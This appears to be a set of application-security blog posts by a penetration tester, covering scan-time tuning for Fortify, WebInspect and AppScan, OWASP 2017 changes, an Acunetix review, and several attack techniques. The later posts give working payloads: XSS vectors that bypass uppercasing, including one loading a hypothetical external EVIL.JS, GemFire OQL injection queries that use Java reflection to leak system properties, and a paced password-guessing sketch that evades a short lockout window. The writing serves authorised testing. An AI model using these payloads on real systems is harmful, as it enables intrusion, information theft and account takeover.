How do you refine time spent on application security scans?

A technocrat I respect asked me this question. "Year on year, you do scans using Fortify, WebInspect, AppScan and so on. But the scan time is always the same. Why can't you refine it?"

I replied, "Even brushing my teeth is something I have been doing for decades, but I still take the same amount of time. I am dead scared to automate the process." Though he took this in good humour and we laughed over it, I did tell him that scans can indeed be refined and the effort cut down. But it is not as if you did a scan in 2 hours this year and, wanting to increase productivity next year, you simply decide to finish it within 30 minutes. That kind of blind refinement doesn't exist.

So, what exactly can you do to cut down the scan time? To answer that, you should first know why an application with X number of pages takes Y amount of time to scan. All the tools you use are essentially automated script engines that spider your application and replay a set of rules/malicious vectors against it. So,

  1. The more web pages in your application, the longer the scan will take.
  2. The more input fields in your site, the more time it takes to execute the rules, since every step has to be tried against each input field.
  3. The more complexity in your site, the more time it will take. For example, if the application has a file upload feature, a CAPTCHA or a dynamically generated script, each of those adds a certain amount of time.

These three parameters are not really in your hands, and tweaking them will reduce the quality of your scan output. So, what can you actually reduce?

  1. Get the best infrastructure possible. Don't expect a scan to run on 8 MB of RAM; go for the maximum your organization allows. If you are using a dual-core processor, ask for a quad-core or even better.
  2. All scan engines write temporary files and log files to the same drive the OS is on. Change this default setting so that the system doesn't slow down as the log file grows huge. If the OS is on C:/, you can point the log files to another drive.
  3. Policy -> WebInspect uses the 'Standard' policy by default and AppScan uses 'Complete'. But if you go into these policies and inspect them, you will realize they contain a big bunch of automated attack vectors that all need to be executed. They may include a check for a Struts vulnerability as well as a PHP WordPress-related vulnerability. So, if you are really sure about the application you are testing, experienced enough and able to exercise sound judgement, the policy can be trimmed to match your application's landscape. I have tried this on applications and had the scan time reduce by more than half.
  4. Threading -> The more threads your tool uses, the sooner it will complete your scan, but that comes at the cost of CPU usage. If it looks like the tool is about to crash, reduce the number of threads.
  5. Scan configuration parameters -> There are other parameters that let you test a page only once per attack, once per unique parameter, or repeatedly for every parameter. If the customer's ultimate goal is a shorter scan and quality can be compromised, you can try this out; just know that you will miss issues that exist only on specific parameters.
  6. Rule suppression, sanitization and others -> What if there is a code issue that is already fixed at the deployment level but the tool still keeps finding it? One good example is the parseDouble() issue. In such cases, you can write a suppression rule at the rule-pack level so that the issue is suppressed and you don't waste time analyzing it later (see the sketch after this list).
  7. Last but not the least -> Schedule your scans so that they run during non-work hours. If the application goes down during the scan, you will have no one to support you; but if you are running against your own instance, this works fine. In one project I worked on, we had to share the same instance with the performance engineering team and hence opted for a different timeslot.
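
As a rough illustration of point 6: Fortify SCA accepts a filter file at scan time, which is one way to keep a known non-issue such as the parseDouble() finding out of the results you have to analyze. This is only a sketch and the category string below is a placeholder; check the exact category or instance ID that your own rulepack reports before relying on it.

    # filter.txt, passed to the scan phase, e.g. sourceanalyzer -b mybuild -scan -filter filter.txt
    # Each line is a category, rule ID or instance ID to drop from the results.
    Denial of Service: Parse Double

The dynamic scanners have equivalent knobs: most of them let you disable individual checks or mark a finding as noise so that it is not re-reported and re-triaged on every run.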

Do you have any other measure that can reduce scan time?


Effort Estimation Model for DAST and SAST

Quite often during my pre-sales work, I am asked to derive the effort estimate for DAST (Dynamic Application Security Testing) and SAST (Static Application Security Testing). These two testing methodologies are not new in a software development life cycle and are almost always performed when a web application is internet facing. Read on if you are a customer (software owner) who requires DAST and SAST services for your application, or a service provider who wishes to offer this service.


What to do when your XSS attack vector is converted into CAPITAL letters by the application?

We keep encountering many kinds of unintended filters that applications apply before presenting user input. One of them is rendering all user input in CAPITAL letters. Even if the application does no input validation at all, our normal XSS attack vector doesn't work in this scenario.

Here is an example: within script tags, you would have injected an inline alert(document.cookie);

In this case, the application converts it into ALERT(DOCUMENT.COOKIE). As JavaScript is case sensitive, the alert fails to pop up. Below are the options you can try in this case.
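
For instance, a typical probe and the way the application reflects it back (the surrounding script tags are shown here only for illustration):

    Injected:  <script>alert(document.cookie)</script>
    Reflected: <SCRIPT>ALERT(DOCUMENT.COOKIE)</SCRIPT>

The uppercased markup still parses as HTML, but the uppercased JavaScript inside it no longer refers to any real function.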

Option 1: If VBScript is supported, try the vector below. Since VBScript is case insensitive, it still works after being converted to VBSCRIPT:MSGBOX("HELLO").

vbscript:msgbox("hello");

Option 2: Try loading external JavaScript. If your target application is behind a firewall, you can host your own JS file on an internal network host and load it from there. The uppercasing doesn't hurt here, because HTML tag and attribute names and the hostname are case insensitive, and the contents of the external file are never transformed.
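
A minimal sketch of such a payload (the internal host 10.0.0.5 and the file name EVIL.JS are hypothetical; host the file under the uppercased path so the URL still resolves after conversion):

    <SCRIPT SRC="HTTP://10.0.0.5/EVIL.JS"></SCRIPT>

Whatever you put inside EVIL.JS keeps its original case, so a plain alert(document.cookie) in that file runs normally.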

If the above two options don't work, you can try iframe or img src tags to carry your attack vector, since tag and attribute names are also case insensitive. There are some more ingenious tricks, like the one at http://www.jsfuck.com/ (JavaScript written entirely with case-less symbols), but those are for rare cases. Hope this tip helped you.

OWASP Top 10 – 2017 – Release Candidate

The OWASP Top 10 – 2017 may be finalized in July or August this year but I had a chance to look at the release candidate version.

Some Changes:

  1. The category 'Unvalidated Redirects and Forwards' has been dropped.
  2. The categories 'Insecure Direct Object References' and 'Missing Function Level Access Control' have been clubbed together. So, whether the issue is with the data or with the functionality, that difference doesn't matter any more.
  3. Two new categories have made it into the Top 10: 'Insufficient Attack Protection', which is about detecting and deterring automated attacks against applications, and 'Underprotected APIs', which targets issues in APIs such as REST and JSON-based services.

https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf


Acunetix Version 11

I got an opportunity to look into Acunetix version 11. With this version they have moved to a web-based product, which is kind of good. Looking into it, these are the positive vibes I get.

  • I can exclude certain hours from the scan configuration. Say I don't want the scan to run during my night time; I can set that.
  • Likewise, if I need manual intervention for a CAPTCHA, there are options for that.

But that’s it. I am not able to find another feature that will make me go gaga over Acunetix.

  1. Their scanning profiles actually look scary, as I don't know which rules are part of the Complete scan and which are part of the High Risk scan. I can't seem to customize either.
  2. I seem to have had a lot more control over the scan and application configuration with the desktop-based product than I do with the web version. Though I realize that many utilities that shipped with the desktop version are now available as freebies, the web version looks kind of empty.
  3. I really can't figure out how to pause and resume a scan. The desktop version had it.
  4. Detailed logging, the Google hacking database and many fine-tuning options all seem to have gone missing.

A rather disappointing build, I should say. I will probably wait for the next one.

GemFire OQL – Information Leakage

GemFire is an in-memory data grid. It pools memory across multiple processes to manage application objects and behaviour. It is written in Java and stores data in a key-value structure. The data lives in something called a 'region', which can be queried using an Object Query Language (OQL), much like one would use SQL for an RDBMS.

I came to know about this some time back, and since the opportunity to abuse OQL is rare, I googled a bit about it. The only write-up I found that connects GemFire OQL to remote command injection is below.

http://blog.emaze.net/2014/11/gemfire-from-oqli-to-rce-through.html

While doing a penetration test, I tried following the examples cited in this blog. The application I was testing was doing blacklist filtering, so not all the attack vectors went through cleanly, but the first one that succeeded was something like the query below.

  1. select * from /region1 limit 10

Comments: the query returned exactly 10 rows, which told me that whatever data I passed in the parameter was being appended straight into the query.

  2. select p.getclass.forName('java.lang.Runtime').getDeclaredMethods()[7].getName() from /region1 p

This query is similar to the one explained in the emaze blog; using this construct, you can list all the methods of the Runtime class. Getting to this stage was a little tough, as I had to tweak the payload to find out which parts were being accepted and which weren't. For some reason, the invoke method wasn't working at all. Before calling it a day, I passed the query on to my colleague Prashanth, working in a different timezone, who cracked it.

  3. select p.getclass.forName('java.lang.System').getDeclaredMethods()[5].invoke(null, 'os.version'.split('asd')) from /region1 p

This returned the OS version, and likewise one can pull out the other System properties with similar queries. So, in your testing, even if you don't get RCE, try an information leakage like the one above.
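
To make the trick clearer, here is roughly what that last query does, expressed as plain Java. This is only an illustrative sketch of the reflection chain, not GemFire code: the method index (5 in the query) is JVM-dependent, so the loop below prints the index alongside the result, and 'os.version'.split('asd') is simply a way of wrapping a string in a one-element array without using syntax that OQL rejects.

    import java.lang.reflect.Method;

    public class OqlReflectionSketch {
        public static void main(String[] args) throws Exception {
            // split() never matches "asd", so this just wraps the property name
            // in a one-element String[] that can serve as invoke()'s argument array.
            String[] invokeArgs = "os.version".split("asd");

            // Enumerate java.lang.System's declared methods, as in query 2, and
            // call the one-argument getProperty overload reflectively. This is
            // equivalent to System.getProperty("os.version").
            Method[] methods = Class.forName("java.lang.System").getDeclaredMethods();
            for (int i = 0; i < methods.length; i++) {
                Method m = methods[i];
                if (m.getName().equals("getProperty") && m.getParameterCount() == 1) {
                    System.out.println("index " + i + " -> " + m.invoke(null, (Object[]) invokeArgs));
                }
            }
        }
    }

Index 5 just happened to be getProperty on the JVM behind that application; on another JVM you would first list getName() for each index, as in query 2, and pick the one you need.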


RSA Cleartrust Account Lockout Policy

By default, RSA Cleartrust provides an option to lock accounts after five consecutive failed authentication attempts within one day. Likewise, the system can unlock users automatically after a specified amount of time, or an administrator can unlock them manually.

The above configuration seems foolproof, and one wouldn't see anything wrong with it. That was until I stumbled upon a specific configuration in one application, where the development team had set up the account lockout as below.

"Lock accounts after 3 consecutive failed attempts within 2 minutes." => I didn't even know this was possible. At a glance it looks even more promising, since such a setting can catch a robot early. But wait: if I am a malicious insider or a person known to the victim, I can abuse this by pacing my guesses (say, a couple of attempts every three minutes) so that three failures never fall within the same two-minute window, and eventually capture the password. The default one-day window, by contrast, allows an attacker only a handful of unnoticed guesses per day. I don't have to be a robot to get this out.
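
A minimal sketch of that pacing logic against a hypothetical login endpoint (tryLogin() is a placeholder for the real authentication request, and the two-minute figure is the one from the setting above). Staying one attempt below the threshold and letting the window expire gives well over a thousand guesses a day, compared with at most four under the default one-day policy.

    import java.util.List;

    public class PacedGuessSketch {

        // Placeholder for the real authentication request against the target.
        static boolean tryLogin(String user, String guess) {
            return false;
        }

        public static void main(String[] args) throws InterruptedException {
            List<String> wordlist = List.of("Winter2017", "Password@123", "Welcome1");
            int attemptsInWindow = 0;
            for (String guess : wordlist) {
                // The policy locks the account at 3 failures within 2 minutes,
                // so pause after every 2 failures and let the window expire.
                if (attemptsInWindow == 2) {
                    Thread.sleep((2 * 60 + 10) * 1000L);
                    attemptsInWindow = 0;
                }
                if (tryLogin("victim", guess)) {
                    System.out.println("Password found: " + guess);
                    return;
                }
                attemptsInWindow++;
            }
        }
    }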

I shared my thoughts with the AD team and they removed the interval option from their setting. What are your thoughts?